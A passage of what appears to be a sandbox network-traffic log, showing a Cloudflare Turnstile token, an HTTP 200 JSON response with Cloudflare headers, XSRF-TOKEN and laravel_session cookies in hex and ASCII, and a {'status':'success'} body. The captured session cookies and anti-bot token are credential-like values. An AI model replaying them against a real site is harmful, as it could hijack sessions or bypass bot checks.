name="cf-turnstile-response"0.QXl4lhjEDcxwdwGOkLMe8G6O4wjlOKwu96PcxzaIW94J_B-n1U9n4oCr4fRdXL8OfLWw7UtVHNLU8RmjMkFB8Sj6oAx_q7FymXD0qGCFKY2qUMLQo_aYUlhZhGwL9z1eu25XBm2JEoxGQ166ktq
2024-07-03 07:41:02 UTC	999	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 07:41:02 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Po8Yt%2BG4KWohRfUkdNT%2FT4Uh4jO9S5xDPM2raA9o8J8PUM%2F7eZGsLaV0ra%2BYUWmdNdL7wBVy8OaqnSfy1isvl8liArfsXXNV3YJQTFnXoSPjx0cESeSLE87diCWgfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 Set-Cookie: XSRF-TOKEN=eyJpdiI6ImdBU0dxSWJsZjlwMDU3aEx6ZEd1VUE9PSIsInZhbHVlIjoib2tVdVZNZU1saFAwM1dSRDRVajVVTEVGOFVJUGZ3bG5MOEhhRGRXK0E1ckwwTXdqOU9pVW91Tk1JVTI4Szk0WE00Q1hDdmtkWFdmNFR6UU9nVXBrUjhUdFFjUG92amFzc0l5Z0t3ZlhQQm0vS1p4UCtqN1BBQXQzTEZBNWdpcWwiLCJtYWMiOiI3Nzg0Zjg1NmMyOTlkNGY4NzcxMjE5MTYxN2RhMzQ2YTRhMDNjOWU0OGI5ZmFhNDUzZGE0ZTE1MTkzNDY5YzA5IiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:41:02 GMT; Max-Age=7200; path=/; secure; samesite=none
2024-07-03 07:41:02 UTC	518	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 51 77 5a 47 6f 32 62 55 39 79 65 6d 39 77 52 6d 68 57 53 48 46 6b 55 46 46 44 53 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 58 46 36 55 47 64 58 4c 32 30 32 63 6b 4a 7a 5a 47 6f 72 4e 56 5a 72 4c 30 64 70 62 54 68 7a 61 58 45 7a 4e 31 42 54 55 47 70 79 4d 47 68 6a 61 6d 56 78 4d 33 49 7a 65 6c 67 33 54 44 52 76 51 57 77 31 4d 6e 68 58 59 56 49 7a 56 31 4a 35 55 31 42 78 4c 32 68 6d 56 33 52 45 59 32 78 5a 55 47 39 69 52 6e 4a 7a 61 33 55 35 64 6e 5a 4a 5a 30 46 4f 52 57 51 30 63 54 56 73 4e 6d 4a 61 55 6c 4e 4b 53 32 56 31 59 6c 4e 78 5a 46 6c 57 59 6e 59 79 63 56 6c 6b 53 6b 6c 71 51 6d 46 43 54 45 6c 35 4e 44 42 31 54 56 59 Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InQwZGo2bU9yem9wRmhWSHFkUFFDS0E9PSIsInZhbHVlIjoiaXF6UGdXL202ckJzZGorNVZrL0dpbThzaXEzN1BTUGpyMGhjamVxM3Izelg3TDRvQWw1MnhXYVIzV1J5U1BxL2hmV3REY2xZUG9iRnJza3U5dnZJZ0FORWQ0cTVsNmJaUlNKS2V1YlNxZFlWYnYycVlkSklqQmFCTEl5NDB1TVY
2024-07-03 07:41:02 UTC	26	IN	Data Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a Data Ascii: 14{"status":"success"}
2024-07-03 07:41:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0